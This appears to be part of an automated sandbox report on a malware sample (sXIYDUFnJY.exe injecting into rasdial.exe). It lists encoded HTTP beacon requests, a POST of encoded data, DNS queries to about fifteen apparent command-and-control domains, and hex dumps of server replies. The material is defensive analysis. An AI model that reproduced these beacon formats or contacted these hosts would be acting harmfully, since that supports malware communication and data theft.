'av#"h>UZgw+P;wrhcFCL<9_K8G0oI=v1.ERi`URupZABWXN!q^x?)b71x_Wece
            Source: global trafficHTTP traffic detected: GET /v1m8/?56gD=MbosJJuAq5eUJ0hM82jOLc1IU8MUdjy9hjG8r0T6YD1U+30HrEc2VhBeVjG8H8kt/NUkGofbq5WDcsdH4YqjtrTEBunpF4CO/Z471XhtI61SngqlGgfTsbE=&gTSpc=Khb8pT HTTP/1.1Host: www.weep.siteAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /l4rw/?56gD=ZXNQqBP58JXIf3luRKwQutCZ8KZdKGRl9UucInMS2YFRqgKt0pQ9Lq2gj3LI6pyb9XKzluqnMvvmNnss5NGj5OwULwtMZgZPw4PUiP5SYTwADLBcTbBMjV4=&gTSpc=Khb8pT HTTP/1.1Host: www.88nn.proAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /t3gh/?56gD=d/YHbjU0lRTRkwDxqDIxsrPGLZyEpz4ER5WtK+J3r0U/ADUIPiMSea/+ySZyWjMipb/6l9jjBkeXWJl7BthesnFC5CTi9Yzd9moJgM9Hp7ieo4nvRaLbJdA=&gTSpc=Khb8pT HTTP/1.1Host: www.fontanerourgente.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /zctj/?56gD=tSuw7IYRRjv+wnLSX6BcwOUAvtHef9BV3SuosHDPhpHVIQ9U3bF8KrgVZ9eofhuzjMlHgMWokK5nneJg1eEherCeW9gkiaKlQQJDWwurePQCYs04wJT4uh8=&gTSpc=Khb8pT HTTP/1.1Host: www.onlytradez.clubAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /kyiu/?56gD=XDGtsL25HTw6JP67Ly7M1BrbeTxg63xVn4NdqHGWC1gt1eOjH+BVmk6PIm5PWw2c27Ak8m93WqRL2MBomZszGMKw0lI8qqbvBzBP6NUCsyvYxAKvE0l8E9k=&gTSpc=Khb8pT HTTP/1.1Host: www.32wxd.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /f9bc/?56gD=6SLGUfBvDKizOJgh7zQ0wdcCvGBSm89i7oEe4x7u5mEB7F/p7TzH3kWVQQZ5nrAfRyQgCx35fGtmx6dEsYxPA9ia3C50a/z/OeG1bPlxFxHVM2abTu6B/y8=&gTSpc=Khb8pT HTTP/1.1Host: www.jaxo.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /647x/?56gD=FnaXBox54+ag7g5iwmP6lEuaYrNy9xf43eRchhJyHcxj2nBsvZZTTofBDuDrTRxDwJS/xlxq28wFbCJ7okUph0PYpOGusRgBTCti0+GqRf9NYEJ3M3nIg3s=&gTSpc=Khb8pT HTTP/1.1Host: www.xforum.techAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /l90v/?56gD=65tz+8+CHtIdUwlLn50vsNwtrDevriXy7kK7USWOBh85j9WcKbCPI7UII3emD6Kks24YSbVOAcNXIRb+3rSlOmC04vqSX9mxzzPTrJ5MFsobFyJ/S8Jm0iQ=&gTSpc=Khb8pT HTTP/1.1Host: www.cannulafactory.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /rgqx/?56gD=k7UoFTYShwNh8X30FXwm38h6K+JkxlagtcywMstwCAmbg7ptW+NBcIDWqO/wkzukyRO00HsnixKpsDOlj0tXoOzwTrau4xfQqB+I7fBgXd6C+YuuVtNtf8U=&gTSpc=Khb8pT HTTP/1.1Host: www.ayypromo.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /qpwk/?56gD=Pn8OF1j/flre3VebOMg2UbcWr5CJafCXadgaNymjhjlyVvhoWwCe/sZUerDBeXD1/Dp7mYeP8BtJLpf3hF/3n4t4NMFgDvNRYoQEyTx0vs+6FBV4KM09ubA=&gTSpc=Khb8pT HTTP/1.1Host: www.anaidittrich.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /0or4/?56gD=Ap9XVhmqGkofKqiWnW9mL5/l5ZSEUCfyrZ4yzU5Yy+i7TWDOWZwNJN7AITR5XrxbOYEdZ4fD4Uqd39DYFcK8F05zK8C70DAcVzFic5Orq8iLvChdOek9rdc=&gTSpc=Khb8pT HTTP/1.1Host: www.551108k5.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /gs9g/?gTSpc=Khb8pT&56gD=1tUju/dHge3HLZSeaGkKb9xpXzDM3iDxyQikSChTyVI6tApcYR3Jee2z9yFvFCdZtAxjWN4NnVxgCMN8Nn90/pKfV4KQ80W7DCKACFqXJiPyHwctgLFsPv8= HTTP/1.1Host: www.datensicherung.emailAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /uhl0/?56gD=ncGfyjKG78FJ3RoiM5vIj9c1hRDw+kHAJl3DW65koN/XsollpddV5N2bVVuKdzPyIkh4e3ZVd/UrgbHQf7fI8bXCzTYoePvJD/HBD8ObPaKNbBrKYFELLGg=&gTSpc=Khb8pT HTTP/1.1Host: www.jiyitf.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /7o3y/?gTSpc=Khb8pT&56gD=34bWgTnU4AX1gKZq+j0JMo89G/eR8V4xUDpx7/bRsS0fRbM850xuSZ+vkJ4N+S3djb8r5M9tcI2Ggb3yyq8UxrbVXfSA+Cuoh4JbcMUl7SslS3/OMRxqtpA= HTTP/1.1Host: www.tadalaturbo.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
            Source: rasdial.exe, 00000006.00000002.4131381557.0000000005C28000.00000004.10000000.00040000.00000000.sdmp, sXIYDUFnJY.exe, 00000007.00000002.4130799884.0000000002E98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: <li id="menu-item-19" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-19"><a href="https://www.facebook.com/wordpress"><svg class="svg-icon" width="24" height="24" aria-hidden="true" role="img" focusable="false" width="24" height="24" viewBox="0 0 24 24" version="1.1" xmlns="http://www.w3.org/2000/svg"><path d="M12 2C6.5 2 2 6.5 2 12c0 5 3.7 9.1 8.4 9.9v-7H7.9V12h2.5V9.8c0-2.5 1.5-3.9 3.8-3.9 1.1 0 2.2.2 2.2.2v2.5h-1.3c-1.2 0-1.6.8-1.6 1.6V12h2.8l-.4 2.9h-2.3v7C18.3 21.1 22 17 22 12c0-5.5-4.5-10-10-10z"></path></svg><span class="screen-reader-text">Facebook</a></li> equals www.facebook.com (Facebook)
            Source: rasdial.exe, 00000006.00000002.4131381557.0000000005C28000.00000004.10000000.00040000.00000000.sdmp, sXIYDUFnJY.exe, 00000007.00000002.4130799884.0000000002E98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: <li id="menu-item-20" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-20"><a href="https://twitter.com/wordpress"><svg class="svg-icon" width="24" height="24" aria-hidden="true" role="img" focusable="false" width="24" height="24" viewBox="0 0 24 24" version="1.1" xmlns="http://www.w3.org/2000/svg"><path d="M22.23,5.924c-0.736,0.326-1.527,0.547-2.357,0.646c0.847-0.508,1.498-1.312,1.804-2.27 c-0.793,0.47-1.671,0.812-2.606,0.996C18.324,4.498,17.257,4,16.077,4c-2.266,0-4.103,1.837-4.103,4.103 c0,0.322,0.036,0.635,0.106,0.935C8.67,8.867,5.647,7.234,3.623,4.751C3.27,5.357,3.067,6.062,3.067,6.814 c0,1.424,0.724,2.679,1.825,3.415c-0.673-0.021-1.305-0.206-1.859-0.513c0,0.017,0,0.034,0,0.052c0,1.988,1.414,3.647,3.292,4.023 c-0.344,0.094-0.707,0.144-1.081,0.144c-0.264,0-0.521-0.026-0.772-0.074c0.522,1.63,2.038,2.816,3.833,2.85 c-1.404,1.1-3.174,1.756-5.096,1.756c-0.331,0-0.658-0.019-0.979-0.057c1.816,1.164,3.973,1 equals www.twitter.com (Twitter)
            Source: global trafficDNS traffic detected: DNS query: www.weep.site
            Source: global trafficDNS traffic detected: DNS query: www.88nn.pro
            Source: global trafficDNS traffic detected: DNS query: www.fontanerourgente.net
            Source: global trafficDNS traffic detected: DNS query: www.onlytradez.club
            Source: global trafficDNS traffic detected: DNS query: www.32wxd.top
            Source: global trafficDNS traffic detected: DNS query: www.jaxo.xyz
            Source: global trafficDNS traffic detected: DNS query: www.xforum.tech
            Source: global trafficDNS traffic detected: DNS query: www.cannulafactory.top
            Source: global trafficDNS traffic detected: DNS query: www.taapbit.online
            Source: global trafficDNS traffic detected: DNS query: www.ayypromo.shop
            Source: global trafficDNS traffic detected: DNS query: www.anaidittrich.com
            Source: global trafficDNS traffic detected: DNS query: www.551108k5.shop
            Source: global trafficDNS traffic detected: DNS query: www.datensicherung.email
            Source: global trafficDNS traffic detected: DNS query: www.jiyitf.top
            Source: global trafficDNS traffic detected: DNS query: www.tadalaturbo.online
            Source: unknownHTTP traffic detected: POST /l4rw/ HTTP/1.1Host: www.88nn.proAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateOrigin: http://www.88nn.proReferer: http://www.88nn.pro/l4rw/Cache-Control: max-age=0Connection: closeContent-Length: 201Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36Data Raw: 35 36 67 44 3d 55 56 6c 77 70 32 61 49 39 4a 7a 4c 58 6c 74 31 64 50 34 4e 31 76 6e 2b 34 50 68 78 51 46 55 51 31 78 6e 73 58 47 30 59 2b 2b 4a 68 70 42 2b 50 31 4b 4e 47 55 62 71 33 70 56 37 65 72 4e 69 36 68 30 71 4c 74 2b 4f 6b 48 38 33 55 45 6b 30 48 34 38 57 45 30 2b 6b 52 51 53 34 52 56 6e 4e 43 67 36 53 74 36 6f 49 45 4e 32 52 57 4a 5a 52 5a 54 4e 49 7a 38 6e 5a 41 62 4a 63 77 38 59 78 59 51 41 64 70 42 6a 2b 4e 4c 52 42 61 41 43 4e 46 34 75 34 78 43 30 70 4b 70 72 72 78 2f 79 61 58 6b 78 2b 74 49 69 4a 6f 4d 35 73 50 69 44 6b 76 54 46 30 41 36 76 46 72 4f 38 57 78 32 34 43 70 48 77 3d 3d Data Ascii: 56gD=UVlwp2aI9JzLXlt1dP4N1vn+4PhxQFUQ1xnsXG0Y++JhpB+P1KNGUbq3pV7erNi6h0qLt+OkH83UEk0H48WE0+kRQS4RVnNCg6St6oIEN2RWJZRZTNIz8nZAbJcw8YxYQAdpBj+NLRBaACNF4u4xC0pKprrx/yaXkx+tIiJoM5sPiDkvTF0A6vFrO8Wx24CpHw==
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 04 Sep 2024 07:35:46 GMTServer: ApacheAccept-Ranges: bytesCache-Control: no-cache, no-store, must-revalidatePragma: no-cacheExpires: 0Connection: closeTransfer-Encoding: chunkedContent-Type: text/htmlData Raw: 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 31 35 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 0d 0a 33 0d 0a 34 30 34 0d 0a 31 0d 0a 20 0d 0a 39 0d 0a 4e 6f 74 20 46 6f 75 6e 64 0d 0a 31 66 63 61 0d 0a 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 04 Sep 2024 07:36:02 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "667cd175-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 04 Sep 2024 07:36:05 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "667cd175-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 04 Sep 2024 07:36:07 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "667cd175-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 04 Sep 2024 07:36:10 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "667cd175-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 04 Sep 2024 07:36:16 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://mgmasistencia.com/wp-json/>; rel="https://api.w.org/"Connection: closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 63 65 32 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 22 20 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 3c 74 69 74 6c 65 3e 50 c3 a1 67 69 6e 61 20 6e 6f 20 65 6e 63 6f 6e 74 72 61 64 61 20 26 23 38 32 31 31 3b 20 4d 47 4d 20 41 73 69 73 74 65 6e 63 69 61 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 6d 67 6d 61 73 69 73 74 65 6e 63 69 61 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4d 47 4d 20 41 73 69 73 74 65 6e 63 69 61 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6d 67 6d 61 73 69 73 74 65 6e 63 69 61 2e 63 6f 6d 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4d 47 4d 20 41 73 69 73 74 65 6e 63 69 61 20 26 72 61 71 75 6f 3b 20 46 65 65 64 20 64 65 20 6c 6f 73 20 63 6f 6d 65 6e 74 61 72 69 6f 73 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6d 67 6d 61 73 69 73 74 65 6e 63 69 61 2e 63 6f 6d 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 6d 67 6d 61 73 69 73 74 65 6e 63 69 61 2e 63 6f 6d 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 04 Sep 2024 07:36:18 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://mgmasistencia.com/wp-json/>; rel="https://api.w.org/"Connection: closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 63 65 32 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 22 20 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 3c 74 69 74 6c 65 3e 50 c3 a1 67 69 6e 61 20 6e 6f 20 65 6e 63 6f 6e 74 72 61 64 61 20 26 23 38 32 31 31 3b 20 4d 47 4d 20 41 73 69 73 74 65 6e 63 69 61 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 